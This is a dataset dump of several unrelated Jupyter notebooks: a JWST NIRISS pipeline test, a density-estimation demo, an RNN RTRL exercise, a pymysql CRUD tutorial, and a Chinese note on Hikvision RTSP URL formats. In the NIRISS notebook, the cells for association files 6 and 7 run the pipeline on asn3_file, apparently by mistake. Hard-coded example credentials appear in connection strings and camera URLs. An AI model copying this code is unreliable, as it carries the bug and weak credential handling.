"Association file 6 to calibrate calibrator at POS2 with calibrator at POS3",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn6_file = \"ami_asn006_calibrate_cal2_cal3.json\"\n\ntarg1 = \"jw01093002001_01101_00006_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00007_nis_cal.fits\"\nprod_name = \"jw01093002001_01101_00006cal00007\"\nasn_id = '006'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn6_file, asn_id, targ_name='t002')\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 7 to calibrate calibrator at POS3 with calibrator at POS2",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn7_file = \"ami_asn007_calibrate_cal3_cal2.json\"\n\ntarg1 = \"jw01093002001_01101_00007_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00006_nis_cal.fits\"\nprod_name = \"jw01093002001_01101_00007cal00006\"\nasn_id = '007'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn7_file, asn_id, targ_name='t002')\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"<a id=\"testing\"></a>\n# Test Results\n\nDid the above cells run without errors? If so, **huzzah** the test passed! \n\nIf not, track down why the pipeline failed to run on these datasets.\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"about_ID\"></a>\n## About this Notebook\n**Authors:** Deepashri Thatte, Senior Staff Scientist, NIRISS\n<br>Stephanie LaMassa, Scientist, NIRISS\n<br>**Updated On:** 08/04/2021",
"_____no_output_____"
],
[
"[Top of Page](#title_ID)\n<img style=\"float: right;\" src=\"./stsci_pri_combo_mark_horizonal_white_bkgd.png\" alt=\"stsci_pri_combo_mark_horizonal_white_bkgd\" width=\"200px\"/> ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
cb2d0d15f988ec89a069f3e8437fa03ec2f752dc | 113,682 | ipynb | Jupyter Notebook | demos/density_estimation_demo.ipynb | DMGREENHOUSE/inference-tools | 4b007cdcb6ae31dad6a5edf6cb50b6a9120c27e7 | [
"MIT"
] | 12 | 2019-07-05T07:46:35.000Z | 2022-02-08T12:23:06.000Z | demos/density_estimation_demo.ipynb | C-bowman/inference_tools | 7b7b8f5618a2387086fedd546996b17cffa7e30d | [
"MIT"
] | 6 | 2020-01-22T15:54:59.000Z | 2021-11-05T11:02:51.000Z | demos/density_estimation_demo.ipynb | C-bowman/inference_tools | 7b7b8f5618a2387086fedd546996b17cffa7e30d | [
"MIT"
] | 2 | 2020-03-17T15:17:39.000Z | 2022-02-10T15:31:51.000Z | 433.900763 | 46,764 | 0.94197 | [
[
[
"# Density estimation demo\n\nHere we demonstrate how to use the ``inference.pdf`` module for estimating univariate probability density functions from sample data.",
"_____no_output_____"
]
],
[
[
"from numpy import linspace, zeros, exp, log, sqrt, pi\nfrom numpy.random import normal, exponential\nfrom scipy.special import erfc\nimport matplotlib.pyplot as plt",
"_____no_output_____"
]
],
[
[
"## Kernel-density estimation\n\nGaussian kernel-density estimation is implemented via the `GaussianKDE` class:",
"_____no_output_____"
]
],
[
[
"# generate some sample data to use as a test-case\nN = 150000\nsample = zeros(N)\nsample[:N//3] = normal(size=N//3)*0.5 + 1.8\nsample[N//3:] = normal(size=2*(N//3))*0.5 + 3.5",
"_____no_output_____"
],
[
"# GaussianKDE takes an array of sample values as its only argument\nfrom inference.pdf import GaussianKDE\nPDF = GaussianKDE(sample)",
"_____no_output_____"
]
],
[
[
"Instances of density estimator classes like `GaussianKDE` can be called as functions to return the estimate of the PDF at given spatial points:",
"_____no_output_____"
]
],
[
[
"x = linspace(0, 6, 1000) # make an axis on which to evaluate the PDF estimate\np = PDF(x) # call the instance to get the estimate",
"_____no_output_____"
]
],
[
[
"We could plot the estimate manually, but for convenience the `plot_summary()` method will generate a plot automatically as well as summary statistics:",
"_____no_output_____"
]
],
[
[
"PDF.plot_summary()",
"_____no_output_____"
]
],
[
[
"The summary statistics can be accessed via properties or methods:",
"_____no_output_____"
]
],
[
[
"# the location of the mode is a property\nmode = PDF.mode\n\n# The highest-density interval for any fraction of total probability is returned by the interval() method\nhdi_95 = PDF.interval(frac = 0.95)\n\n# the mean, variance, skewness and excess kurtosis are returned by the moments() method:\nmean, variance, skewness, kurtosis = PDF.moments()",
"_____no_output_____"
]
],
[
[
"By default, `GaussianKDE` uses a simple but easy to compute estimate of the bandwidth (the standard deviation of each Gaussian kernel).\nHowever, when estimating strongly non-normal distributions, this simple approach will over-estimate required bandwidth.\n\nIn these cases, the cross-validation bandwidth selector can be used to obtain better results, but with higher computational cost.",
"_____no_output_____"
]
],
[
[
"# to demonstrate, lets create a new sample:\nN = 30000\nsample = zeros(N)\nsample[:N//3] = normal(size=N//3)\nsample[N//3:] = normal(size=2*(N//3)) + 10\n\n# now construct estimators using the simple and cross-validation estimators\npdf_simple = GaussianKDE(sample)\npdf_crossval = GaussianKDE(sample, cross_validation = True)\n\n# now build an axis on which to evaluate the estimates\nx = linspace(-4,14,500)\n\n# for comparison also compute the real distribution\nexact = (exp(-0.5*x**2)/3 + 2*exp(-0.5*(x-10)**2)/3)/sqrt(2*pi)\n\n# plot everything together\nplt.plot(x, pdf_simple(x), label = 'simple')\nplt.plot(x, pdf_crossval(x), label = 'cross-validation')\nplt.plot(x, exact, label = 'exact')\nplt.ylabel('probability density')\nplt.xlabel('x')\nplt.grid()\nplt.legend()\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Functional density estimation for unimodal PDFs\n\nIf we know that the distribution being estimated is a single (but potentially highly skewed) peak, the `UnimodalPdf` class can robustly estimate the PDF even at smaller sample sizes. It works by fitting a heavily modified Student-t distribution to the sample data.",
"_____no_output_____"
]
],
[
[
"# Create some samples from the exponentially-modified Gaussian distribution\nL = 0.3 # decay constant of the exponential distribution\nsample = normal(size = 3000) + exponential(scale = 1./L, size = 3000)\n\n# create an instance of the density estimator\nfrom inference.pdf import UnimodalPdf\nPDF = UnimodalPdf(sample)\n\n# plot the estimate along with the exact PDF for comparison\nx = linspace(-5, 15, 1000)\nexact = 0.5*L*exp(0.5*L*(L-2*x))*erfc((L-x)/sqrt(2)) # exact PDF for the exp-gaussian distribution\n\nplt.plot(x, PDF(x), label = 'UnimodalPdf estimate', lw = 3)\nplt.plot(x, exact, label = 'exact distribution', ls = 'dashed', lw = 3)\nplt.ylabel('probability density')\nplt.xlabel('x')\nplt.legend()\nplt.grid()\nplt.tight_layout()\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2d0de369c4753b20ff0fb35fae30ac05f29447 | 27,929 | ipynb | Jupyter Notebook | Assignment3.ipynb | rnbdsh/lstm_rnn | 5d181b382e8aa392ec949636fbe650b8fa9955c8 | [
"CC0-1.0"
] | 1 | 2020-12-07T23:22:59.000Z | 2020-12-07T23:22:59.000Z | Assignment3.ipynb | rnbdsh/lstm_rnn | 5d181b382e8aa392ec949636fbe650b8fa9955c8 | [
"CC0-1.0"
] | null | null | null | Assignment3.ipynb | rnbdsh/lstm_rnn | 5d181b382e8aa392ec949636fbe650b8fa9955c8 | [
"CC0-1.0"
] | null | null | null | 94.037037 | 14,540 | 0.786888 | [
[
[
"# Assignment 3: RTRL\n\nImplement an RNN with RTRL. The ds/dw partial derivative is 2D hidden x (self.n_hidden * self.n_input) instead of 3d.",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"class RNN(object):\n def __init__(self, n_input, n_hidden, n_output):\n # init weights and biases\n self.n_input = n_input \n self.n_hidden = n_hidden\n self.n_output = n_output\n \n self.W = np.random.normal(scale=0.1, size=(n_hidden, n_input))\n self.R = np.eye(n_hidden)\n self.V = np.random.normal(scale=0.1, size=(n_output, n_hidden))\n self.bh = np.zeros((n_hidden, 1))\n self.bo = np.zeros((n_output, 1))\n \n self.grad = {}\n self.reset()\n \n \n def reset(self):\n # init hidden activation\n self.s = np.zeros((self.n_hidden, 1))\n self.a = np.zeros((self.n_hidden, 1))\n \n # init buffers for recursive gradients\n self.ds_dW = np.zeros((self.n_hidden, self.n_hidden * self.n_input))\n self.ds_dR = np.zeros((self.n_hidden, self.n_hidden * self.n_hidden)) \n self.ds_db = np.zeros((self.n_hidden, self.n_hidden))\n \n \n def forward(self, x):\n assert x.shape[1] == self.n_input\n assert len(x.shape) == 2\n\n \"\"\"your code goes here, method must return model's prediction\"\"\"\n # partial derivative for accumulation. this is the R * f' * f that can be reused\n der = self.R * np.tile(1-self.a**2, self.n_hidden)\n \n # accumulate gradients\n self.ds_dW = der @ self.ds_dW + np.kron(np.eye(self.n_hidden), x)\n self.ds_dR = der @ self.ds_dR + np.kron(np.eye(self.n_hidden), self.a.T)\n self.ds_db = der @ self.ds_db + np.eye(self.n_hidden)\n \n # do regular 1 step forward pass\n self.s = self.W @ x.T + self.R @ self.a + self.bh\n self.a = np.tanh(self.s) # can be reused in backward pass\n return (self.V @ self.a + self.bo).T\n \n \n def backward(self, y_hat, y):\n assert y_hat.shape[1] == self.n_output\n assert len(y_hat.shape) == 2\n assert y_hat.shape == y.shape, f\"shape mismatch {y_hat.shape} {y.shape}\"\n\n e = (y_hat - y).T # error == derivative{L}/derivative{s} == dL_dy\n dL_ds = ((self.V.T @ e) * (1 - self.a**2)) # transposed to fit shape\n \n # 1:1 copy from ex1, only depend on error\n self.grad[\"bo\"] = e\n self.grad[\"V\"] = e @ self.a.T\n \n # collect new gradients\n self.grad[\"W\"] = (self.ds_dW.T @ dL_ds).reshape(self.W.shape)\n self.grad[\"R\"] = (self.ds_dR.T @ dL_ds).reshape(self.R.shape).T\n self.grad[\"bh\"]= self.ds_db.T @ dL_ds\n \n # compute loss (halved squared error)\n return np.sum(0.5 * (y - y_hat)**2)\n \n \n def fast_forward(self, x_seq):\n # this is a forward pass without gradient computation for gradient checking\n s = np.zeros_like(self.s)\n \n for x in x_seq:\n s = self.W @ x.reshape(*x.shape, 1) + self.R.T @ np.tanh(s) + self.bh\n \n return self.V @ np.tanh(s) + self.bo\n \n \n def gradient_check(self, x, y, eps=1e-5, thresh=1e-5, verbose=True):\n for name, ga in self.grad.items():\n if verbose:\n print(\"weight\\t\",name)\n \n gn = np.zeros_like(ga)\n w = self.__dict__[name]\n for idx, w_orig in np.ndenumerate(w):\n w[idx] = w_orig + eps/2\n hi = np.sum(0.5 * (y - self.fast_forward(x))**2)\n w[idx] = w_orig - eps/2\n lo = np.sum(0.5 * (y - self.fast_forward(x))**2)\n w[idx] = w_orig\n gn[idx] = (hi - lo) / eps\n dev = abs(gn[idx] - ga[idx])\n\n if verbose: # extended error\n print(f\"numeric {gn[idx]}\\tanalytic {ga[idx]}\\tdeviation {dev}\")\n\n assert dev < thresh\n\n \n def update(self, eta):\n # update weights\n for name, grad in self.grad.items():\n self.__dict__[name] -= eta * grad\n\n\ndef generate_samples(seq_length, batch_size, input_size):\n while True:\n x = np.random.uniform(low=-1, high=1, size=(seq_length, batch_size, input_size))\n y = x[0,:,:]\n yield x, y\n\n\ndef check_gradients():\n rnn = RNN(2, 5, 2)\n data = generate_samples(seq_length=10, batch_size=1, input_size=2)\n \n for i, (x, y) in zip(range(1), data):\n rnn.reset()\n \n for x_t in x:\n y_hat = rnn.forward(x_t)\n \n rnn.backward(y_hat, y)\n rnn.gradient_check(x, y.T)\n\ncheck_gradients()",
"weight\t bo\nnumeric 0.815833856365744\tanalytic 0.8158338563577928\tdeviation 7.951195257760446e-12\nnumeric 0.22869662842928126\tanalytic 0.2286966284260183\tdeviation 3.2629732249489507e-12\nweight\t V\nnumeric -0.06227159701777118\tanalytic -0.06227159701766642\tdeviation 1.0475648126728743e-13\nnumeric -0.20825869057050636\tanalytic -0.20825869056251206\tdeviation 7.994299666691518e-12\nnumeric 0.12911525329450946\tanalytic 0.12911525329593596\tdeviation 1.426497808765248e-12\nnumeric -0.25530579405574905\tanalytic -0.25530579405855447\tdeviation 2.805422560925308e-12\nnumeric 0.2864484471010176\tanalytic 0.2864484470922884\tdeviation 8.729184042266525e-12\nnumeric -0.01745613297798876\tanalytic -0.017456132978132165\tdeviation 1.434061203120507e-13\nnumeric -0.058379607564829065\tanalytic -0.058379607564577635\tdeviation 2.514308206080784e-13\nnumeric 0.03619391727438526\tanalytic 0.03619391727499229\tdeviation 6.070352553955161e-13\nnumeric -0.07156797167118256\tanalytic -0.07156797166948202\tdeviation 1.70054248460616e-12\nnumeric 0.08029795963704345\tanalytic 0.08029795963645936\tdeviation 5.840883332552949e-13\nweight\t W\nnumeric 0.013671606452492211\tanalytic 0.013671606447688316\tdeviation 4.803895128913105e-12\nnumeric -0.2150769000619501\tanalytic -0.21507690022036016\tdeviation 1.5841006284489367e-10\nnumeric 0.012788683234621344\tanalytic 0.012788683227092102\tdeviation 7.529241119463848e-12\nnumeric -0.19550745244956144\tanalytic -0.19550745244379822\tdeviation 5.763223231980419e-12\nnumeric 0.01524563655874722\tanalytic 0.01524563657260115\tdeviation 1.3853930155849348e-11\nnumeric -0.23855081199841696\tanalytic -0.23855081210329898\tdeviation 1.0488201973579692e-10\nnumeric 0.003959796057717568\tanalytic 0.003959796061119806\tdeviation 3.4022376929621068e-12\nnumeric -0.05378479031592497\tanalytic -0.053784790292821724\tdeviation 2.310324848098233e-11\nnumeric 0.0071864412698463545\tanalytic 0.007186441267645406\tdeviation 2.2009486247420718e-12\nnumeric -0.11281019885456266\tanalytic -0.11281019877412046\tdeviation 8.044219457215007e-11\nweight\t R\nnumeric 0.009589971200485436\tanalytic 0.009589971201813752\tdeviation 1.3283159294719127e-12\nnumeric 0.013038543761334507\tanalytic 0.013038543766773561\tdeviation 5.439053721301157e-12\nnumeric 0.011950504341662336\tanalytic 0.011950504349134677\tdeviation 7.472340454728332e-12\nnumeric 0.004855610485909878\tanalytic 0.0048556104926691405\tdeviation 6.759262420608092e-12\nnumeric 0.01419271966618396\tanalytic 0.014192719669191193\tdeviation 3.007233351226546e-12\nnumeric 0.07801721159106378\tanalytic 0.07801721159867656\tdeviation 7.612771524279083e-12\nnumeric 0.08586987589320748\tanalytic 0.08586987589683853\tdeviation 3.6310537909756135e-12\nnumeric 0.0911137997661182\tanalytic 0.091113799769927\tdeviation 3.808800497218101e-12\nnumeric 0.028039080446351502\tanalytic 0.028039080441571395\tdeviation 4.780106865887035e-12\nnumeric 0.0726571375897489\tanalytic 0.07265713758945438\tdeviation 2.945144128574384e-13\nnumeric -0.02300715705172429\tanalytic -0.023007157054816194\tdeviation 3.091905204088974e-12\nnumeric -0.03009106588902632\tanalytic -0.030091065889060246\tdeviation 3.392425229620244e-14\nnumeric -0.028308216176720077\tanalytic -0.028308216182653483\tdeviation 5.9334065438676475e-12\nnumeric -0.010972760311478423\tanalytic -0.010972760313402797\tdeviation 1.9243738547114475e-12\nnumeric -0.031528526617252695\tanalytic -0.03152852661157944\tdeviation 5.673253533622358e-12\nnumeric 0.09926859354525418\tanalytic 0.09926859355098165\tdeviation 5.727474050587489e-12\nnumeric 0.10953253145595808\tanalytic 0.10953253145833919\tdeviation 2.381109198701381e-12\nnumeric 0.11600647071841051\tanalytic 0.11600647072619824\tdeviation 7.7877287951722e-12\nnumeric 0.03582540114011046\tanalytic 0.0358254011363949\tdeviation 3.715555640937396e-12\nnumeric 0.09302325829074752\tanalytic 0.09302325829246641\tdeviation 1.7188889200880908e-12\nnumeric -0.1304381055611259\tanalytic -0.1304381055666787\tdeviation 5.552808213238336e-12\nnumeric -0.14082622639688402\tanalytic -0.14082622640597564\tdeviation 9.091616348655407e-12\nnumeric -0.15150442748135262\tanalytic -0.15150442748633935\tdeviation 4.986733248557584e-12\nnumeric -0.045318446678654915\tanalytic -0.04531844668493795\tdeviation 6.283036591003821e-12\nnumeric -0.11566567904019996\tanalytic -0.1156656790551112\tdeviation 1.4911238910286784e-11\nweight\t bh\nnumeric -0.5444968232459768\tanalytic -0.5444968245508781\tdeviation 1.3049012981269925e-09\nnumeric -0.5475656563336262\tanalytic -0.5475656564032372\tdeviation 6.961098364399732e-11\nnumeric -0.6200465527239629\tanalytic -0.6200465535728825\tdeviation 8.489196012817501e-10\nnumeric -0.16670293899179178\tanalytic -0.16670293883403334\tdeviation 1.5775844519616555e-10\nnumeric -0.396927724388707\tanalytic -0.3969277236846757\tdeviation 7.040312777206736e-10\n"
]
],
[
[
"# Train gradient and plot weights",
"_____no_output_____"
]
],
[
[
"def train():\n iter_steps = 15000\n lr = 1e-2\n seq_length = 5\n \n rnn = RNN(1, 10, 1)\n data = generate_samples(seq_length=seq_length, batch_size=1, input_size=1)\n loss = []\n\n for i, (x, y) in zip(range(iter_steps), data):\n rnn.reset()\n\n for x_t in x:\n y_hat = rnn.forward(x_t)\n\n loss.append(rnn.backward(y_hat, y))\n rnn.update(lr)\n\n # plot learnin g curve\n plt.title('sequence length %d' % seq_length)\n plt.plot(range(len(loss)), loss)\n plt.show()\n\ntrain()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2d1b1a64d8b6b145cb14e25c763e13cdedc331 | 22,026 | ipynb | Jupyter Notebook | week14/day3/theory/pymysql/manage_sql_jupyter.ipynb | Clapiniella/data_science_nov_2020 | 7f98e626328169e266b0ee980f457b8402999647 | [
"Apache-2.0"
] | null | null | null | week14/day3/theory/pymysql/manage_sql_jupyter.ipynb | Clapiniella/data_science_nov_2020 | 7f98e626328169e266b0ee980f457b8402999647 | [
"Apache-2.0"
] | null | null | null | week14/day3/theory/pymysql/manage_sql_jupyter.ipynb | Clapiniella/data_science_nov_2020 | 7f98e626328169e266b0ee980f457b8402999647 | [
"Apache-2.0"
] | null | null | null | 29.644684 | 1,324 | 0.504767 | [
[
[
"===============================\n\n### IMPORTS & GET DATABASE INFO",
"_____no_output_____"
]
],
[
[
"from jsons import read_json_to_dict\nfrom mysql_driver import MySQL\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\njson_readed = read_json_to_dict(\"sql_server_settings.json\")\nIP_DNS = json_readed[\"IP_DNS\"]\nUSER = json_readed[\"USER\"]\nPASSWORD = json_readed[\"PASSWORD\"]\nBD_NAME = json_readed[\"BD_NAME\"]\nPORT = json_readed[\"PORT\"]",
"_____no_output_____"
],
[
"# Connect to MySQL\nmysql_db = MySQL(IP_DNS=IP_DNS, USER=USER, PASSWORD=PASSWORD, BD_NAME=BD_NAME, PORT=PORT)\nmysql_db.connect()",
"Connected to MySQL server [clancetin_db]\n"
]
],
[
[
"============== \n\n### DROP TABLE",
"_____no_output_____"
]
],
[
[
"# Drop table if it already exist using execute() method.\n#mysql_db.cursor.execute(\"DROP TABLE IF EXISTS people\")\n\nmysql_db.execute_interactive_sql(sql=\"DROP TABLE IF EXISTS people\")",
"Executed \n\nDROP TABLE IF EXISTS people\n\n successfully\n"
]
],
[
[
"============== \n\n### CREATE TABLE",
"_____no_output_____"
]
],
[
[
"# Create table as per requirement\ncreate_table_sql = \"\"\"CREATE TABLE people(\n ID INT(11) NOT NULL AUTO_INCREMENT,\n MOMENTO TIMESTAMP NOT NULL,\n NOMBRE VARCHAR(20) NOT NULL,\n APELLIDOS VARCHAR(100) NOT NULL,\n DIRECCION VARCHAR(50),\n EDAD INT,\n NOTA VARCHAR(40),\n PRIMARY KEY (ID))\"\"\"\n\nmysql_db.execute_interactive_sql(sql=create_table_sql)",
"Executed \n\nCREATE TABLE people(\n ID INT(11) NOT NULL AUTO_INCREMENT,\n MOMENTO TIMESTAMP NOT NULL,\n NOMBRE VARCHAR(20) NOT NULL,\n APELLIDOS VARCHAR(100) NOT NULL,\n DIRECCION VARCHAR(50),\n EDAD INT,\n NOTA VARCHAR(40),\n PRIMARY KEY (ID))\n\n successfully\n"
]
],
[
[
"============== \n\n### SELECT TABLE",
"_____no_output_____"
]
],
[
[
"# Select\nselect_sql = \"\"\"SELECT * FROM people\"\"\"\nselect_result = mysql_db.execute_get_sql(sql=select_sql)\n\n# tupla de tuplas\ntype(select_result)",
"Executing:\n SELECT * FROM people\n"
],
[
"select_result",
"_____no_output_____"
]
],
[
[
"============== \n\n### INSERT TABLE",
"_____no_output_____"
]
],
[
[
"# Insert\n\nto_insert_1 = [\"Pepito\", \"Wolfram_Eustaquio\", \"Calle Bellavista 9º-B\", \"67\", \"Enfermedad: Ceguera\"]\nto_insert_2 = [\"Juanita\", \"Data Science\", \"Calle Recoletos\", \"15\", \"Está muy alegre siempre\"]\n\nsql_to_insert_1 = mysql_db.generate_insert_into_people_sql(to_insert=to_insert_1)\nsql_to_insert_2 = mysql_db.generate_insert_into_people_sql(to_insert=to_insert_2)",
"_____no_output_____"
],
[
"sql_to_insert_1",
"_____no_output_____"
],
[
"# Otra forma de insert\nmysql_db.execute_interactive_sql(sql=\"\"\"INSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Pepito', 'Wolfram_Eustaquio', 'Calle Bellavista 9º-B', '67', 'Enfermedad: Ceguera')\"\"\")",
"Executed \n\nINSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Pepito', 'Wolfram_Eustaquio', 'Calle Bellavista 9º-B', '67', 'Enfermedad: Ceguera')\n\n successfully\n"
],
[
"mysql_db.execute_interactive_sql(sql=sql_to_insert_1)\nmysql_db.execute_interactive_sql(sql=sql_to_insert_2)",
"Executed \n\nINSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Pepito', 'Wolfram_Eustaquio', 'Calle Bellavista 9º-B', '67', 'Enfermedad: Ceguera')\n\n successfully\nExecuted \n\nINSERT INTO people (MOMENTO, NOMBRE, APELLIDOS, DIRECCION, EDAD, NOTA) VALUES (NOW(), 'Juanita', 'Data Science', 'Calle Recoletos', '15', 'Está muy alegre siempre')\n\n successfully\n"
]
],
[
[
"=====================\n\n### SELECT COLUMNS",
"_____no_output_____"
]
],
[
[
"select_sql = \"\"\"SELECT * FROM people\"\"\"\nselect_result = mysql_db.execute_get_sql(sql=select_sql)\nselect_result",
"Executing:\n SELECT * FROM people\n"
]
],
[
[
"### Select with pandas",
"_____no_output_____"
]
],
[
[
"import pymysql\n\nmysql_db = MySQL(IP_DNS=IP_DNS, USER=USER, PASSWORD=PASSWORD, BD_NAME=BD_NAME, PORT=PORT)\n\n# Version 1 \ndb = mysql_db.connect()\ndf = pd.read_sql(\"select * from people\", con=db)\ndf",
"Connected to MySQL server [clancetin_db]\n"
],
[
"# Version 2\ndb_connection_str = mysql_db.SQL_ALCHEMY\n\n#string = 'mysql+pymysql://root:[email protected]:20001/datasciencetb_db'\ndb_connection = create_engine(db_connection_str)\n\ndf = pd.read_sql(\"select * from people\", con=db_connection)\npd.set_option('display.expand_frame_repr', False)\n\ndf",
"_____no_output_____"
]
],
[
[
"### Insert from pandas",
"_____no_output_____"
]
],
[
[
"table_to_insert = \"people\"\n\ndf_to_insert = df.drop(columns=[\"ID\"])\n# if_exists tiene dos posibilidades: \nto_append = \"append\"\nto_replace = \"replace\"\n\ntry:\n frame_sql = df_to_insert.to_sql(name=table_to_insert, con=db_connection, if_exists=\"append\", index=False)\n print(\"Success\")\nexcept Exception as error:\n print(error)",
"Success\n"
]
],
[
[
"=============================\n\n### Drop row",
"_____no_output_____"
]
],
[
[
"sql_drop = \"\"\"DELETE FROM people WHERE NOMBRE='Pepito';\"\"\"\n\nmysql_db.execute_interactive_sql(sql=sql_drop)",
"Executed \n\nDELETE FROM people WHERE NOMBRE='Pepito';\n\n successfully\n"
]
],
[
[
"=============================\n\n### Update row",
"_____no_output_____"
]
],
[
[
"#CRUD:\n#Create\n#Replace\n#Update\n#Delete",
"_____no_output_____"
],
[
"sql_update = \"\"\"UPDATE people set EDAD=102 WHERE NOMBRE='Juanita';\"\"\"\n\nmysql_db.execute_interactive_sql(sql=sql_update)",
"Executed \n\nUPDATE people set EDAD=102 WHERE NOMBRE='Juanita';\n\n successfully\n"
],
[
"mysql_db.close()",
"Close connection with MySQL server [clancetin_db]\n"
]
],
[
[
"### Ejemplo trabajar directamente con pandas",
"_____no_output_____"
]
],
[
[
"# Version 2\ndb_connection_str = mysql_db.SQL_ALCHEMY\n\n#string = 'mysql+pymysql://root:[email protected]:20001/datasciencetb_db'\n#db_connection = create_engine(string)\ndb_connection = create_engine(db_connection_str)\n\ndf1 = pd.read_sql(\"select * from people\", con=db_connection)\n\ndf1",
"_____no_output_____"
],
[
"df1 = df1[df1.ID <= 5]\ndf1",
"_____no_output_____"
],
[
"# Example\n\ntable_to_insert = \"people\"\n\nto_append = \"append\"\nto_replace = \"replace\"\n\ntry:\n frame_sql = df1.to_sql(name=\"people\", con=db_connection, if_exists=\"replace\", index=False)\n print(\"Success\")\nexcept Exception as error:\n print(error)",
"_____no_output_____"
]
],
[
[
"### Interactuando directamente con la base de datos sin pasar por pandas",
"_____no_output_____"
]
],
[
[
"sql2 = \"\"\"DELETE FROM people WHERE ID>5;\"\"\"\n\nmysql_db.execute_interactive_sql(sql=sql2)",
"Executed \n\nDELETE FROM people WHERE ID>5;\n\n successfully\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2d1b73dde37aeb6325e42d780138d3b59a3dec | 5,145 | ipynb | Jupyter Notebook | 网络协议/RTSP-(5)各主流摄像头的rtsp地址格式.ipynb | wanZzz6/Modules-Learn | 7bb92327372ec369e23b2ef307302a91a9b86a5d | [
"MIT"
] | 13 | 2020-03-07T04:03:36.000Z | 2022-02-28T10:42:32.000Z | 网络协议/RTSP-(5)各主流摄像头的rtsp地址格式.ipynb | wanZzz6/Modules-Learn | 7bb92327372ec369e23b2ef307302a91a9b86a5d | [
"MIT"
] | null | null | null | 网络协议/RTSP-(5)各主流摄像头的rtsp地址格式.ipynb | wanZzz6/Modules-Learn | 7bb92327372ec369e23b2ef307302a91a9b86a5d | [
"MIT"
] | 2 | 2020-03-07T04:03:45.000Z | 2020-04-07T15:35:58.000Z | 27.810811 | 106 | 0.560155 | [
[
[
"# 各主流摄像头的rtsp地址格式\n\n\n## 海康威视\n\n### IPC 摄像头\n\n>rtsp://[username]:[password]@[ip]:[port]/[codec]/[channel]/[subtype]/av_stream\n\n说明:\n- username: 用户名。例如admin。\n- password: 密码。例如12345。\n- ip: 为设备IP。例如 192.0.0.64。\n- port: 端口号默认为554,若为默认可不填写。\n- codec:有h264、MPEG-4、mpeg4这几种。\n- channel: 通道号,起始为1。例如通道1,则为ch1。\n- subtype: 码流类型,主码流为main,辅码流为sub。\n\n**例如**,请求海康摄像机通道1的主码流,Url如下\n主码流:\n- rtsp://admin:[email protected]:554/h264/ch1/main/av_stream\n- rtsp://admin:[email protected]:554/MPEG-4/ch1/main/av_stream\n\n子码流:\n- rtsp://admin:[email protected]/mpeg4/ch1/sub/av_stream\n- rtsp://admin:[email protected]/h264/ch1/sub/av_stream\n\n### NVR\n\n海康新版本,DS系列\n\n> rtsp://username:password@<address>:<port>/Streaming/Channels/<id>(?parm1=value1&parm2-=value2…)\n\n 举例说明:\n\nDS-9632N-ST的IP通道01主码流:\n\nrtsp://admin:[email protected]:554/Streaming/Channels/101?transportmode=unicast\n\nDS-9016HF-ST的IP通道01主码流:\n\nrtsp://admin:[email protected]:554/Streaming/Channels/1701?transportmode=unicast\n\nDS-9016HF-ST的模拟通道01子码流:\n\nrtsp://admin:[email 